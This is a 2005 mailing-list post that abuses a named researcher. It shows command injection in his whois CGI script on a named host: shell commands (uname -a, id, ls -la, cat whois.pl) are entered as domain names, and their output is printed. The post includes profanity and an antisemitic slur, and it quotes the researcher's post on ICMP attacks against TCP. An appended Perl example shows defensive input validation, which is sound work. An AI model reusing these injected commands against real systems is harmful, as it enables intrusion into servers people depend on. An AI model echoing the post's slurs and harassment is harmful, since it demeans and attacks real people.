Full Disclosure mailing list archives
Fernando Gont remote command execution and big mouth vulnerability
From: Joxean Koret <joxeankoret () gmail com>
Date: Wed, 3 Aug 2005 14:22:36 +0200
SHUT THE FUCK UP!!! AND FIX YOUR F%$CK1NG WEBSITE!!! WE ARE ALL SICK OF YOUR BORING E-MAILS!!!! MO/A%SDRF!CKER!

http://thor.prohosting.com/fgont/cgi-bin/whois.pl

whois for domain: uname -a

FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3 #0: Fri Nov 5 10:49:09 MST 2004 jblack () thor prohosting com:/usr/obj/usr/src/sys/LOCAL i386

and whois for domain: id

uid=59286(u0638237) gid=1000(user) groups=1000(user)

and for ls -la

whois ls -la

total 124
dr-xr-xr-x 2 u0638237 2000 512 Dec 28 2003 .
drwxr-xr-x 6 u0638237 2000 512 Jul 21 04:35 ..
-rwxr-xr-x 1 u0638237 2000 15091 Jul 30 2003 cgi-lib.pl
-rwxr-xr-x 1 u0638237 2000 621 Jun 24 2003 cli.pl
-rwxr-xr-x 1 u0638237 2000 993 Jul 30 2003 dig.pl
-rwxr-xr-x 1 u0638237 2000 4388 Dec 28 2003 fuente.cgi
-r--r--r-- 1 u0638237 2000 552 Jun 25 2003 p1.txt
-r--r--r-- 1 u0638237 2000 549 Jul 7 2003 p1dig.txt
-r--r--r-- 1 u0638237 2000 556 Jul 7 2003 p1host.txt
-r--r--r-- 1 u0638237 2000 577 Jul 7 2003 p1ns.txt
-r-xr-xr-x 1 u0638237 2000 562 Dec 28 2003 p1whois.txt
-r--r--r-- 1 u0638237 2000 192 Jun 25 2003 p2.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2dig.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2host.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2ns.txt
-rwxrwxrwx 1 u0638237 2000 192 Dec 27 2003 p2whois.txt
-rwxr-xr-x 1 u0638237 2000 10171 Dec 28 2003 whois.cgi
-rwxr-xr-x 1 u0638237 2000 842 Dec 28 2003 whois.pl

BREAKING NEWS... for registrants of domain cat whois.pl

whois cat whois.pl

#!/usr/local/bin/perl
require('cgi-lib.pl');
&ReadParse;
$p1="p1whois.txt";
$p2="p2whois.txt";
print "Content-type: text/html\r\n\r\n";
$string = $in{'direccion'};
$_ = $string;
$string=~ s/\>//g;
.....
$cmd ----->> YOU FUCKING JEW!!!!!!!!!!! ";
open(p2);
while($linea=){
print "$linea";
}
close(p2);

Turkey hunters, inc
"knock, knock, Neo follow the white turkey!!"

"Fernando Gont" <fernando () frh utn edu ar>
Folks, My posts to this list have tried to show how easy it is to perform ICMP attacks against TCP. The attacks are blind, so the attacker does not need to be a "man in the middle" to perform them. The typical number of packets required to perform any of these attacks is about 16000 (in many cases, the attacker requires fewer packets). This means that even with a 128kbps link, it will take the attacker much less than a minute to perform them.
.....
Fernando Gont e-mail: fernando () gont com ar || fgont () acm org
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
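An added example, not part of the original post and not the site's own script: one way to handle the `direccion` form field so that its value is never parsed by a shell, assuming the elided part of whois.pl builds a whois command line from it. The sub names `valid_domain`, `run_whois` and `html_escape`, the PATH value and the sample inputs are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not the site's script. Sub names are hypothetical.
use strict;
use warnings;

# One DNS label: 1-63 chars, letters/digits/hyphen, no leading or trailing hyphen.
my $LABEL = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;

# Allow-list check: dot-separated labels, at most 253 bytes in total.
# \A and \z anchor the whole string, so an embedded newline cannot slip past.
sub valid_domain {
    my ($name) = @_;
    return 0 unless defined $name && length($name) <= 253;
    return $name =~ /\A$LABEL(?:\.$LABEL)*\z/ ? 1 : 0;
}

# Run whois with an argument list. The list form of open() execs the
# program directly, so no shell ever parses the user-supplied value.
sub run_whois {
    my ($domain) = @_;
    die "rejected input\n" unless valid_domain($domain);
    local $ENV{PATH} = '/usr/bin:/bin';    # assumed location of whois
    open(my $fh, '-|', 'whois', $domain) or die "cannot run whois: $!\n";
    my @lines = <$fh>;
    close($fh);
    return @lines;
}

# The page is served as text/html, so escape whois output before printing it.
sub html_escape {
    my ($text) = @_;
    my %ent = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;', '"' => '&quot;');
    $text =~ s/([&<>"])/$ent{$1}/g;
    return $text;
}

# Constructed sample values for the 'direccion' field; only the validator
# runs here, so the demo needs no network access.
for my $sample ('example.com', 'example.com; id', '`uname -a`', '--help', "example.com\nid") {
    (my $shown = $sample) =~ s/\n/\\n/g;
    printf "%-20s %s\n", $shown, valid_domain($sample) ? 'accepted' : 'rejected';
}
```

Because every label must begin with a letter or digit, a value starting with a hyphen is rejected before it could be read as a whois option.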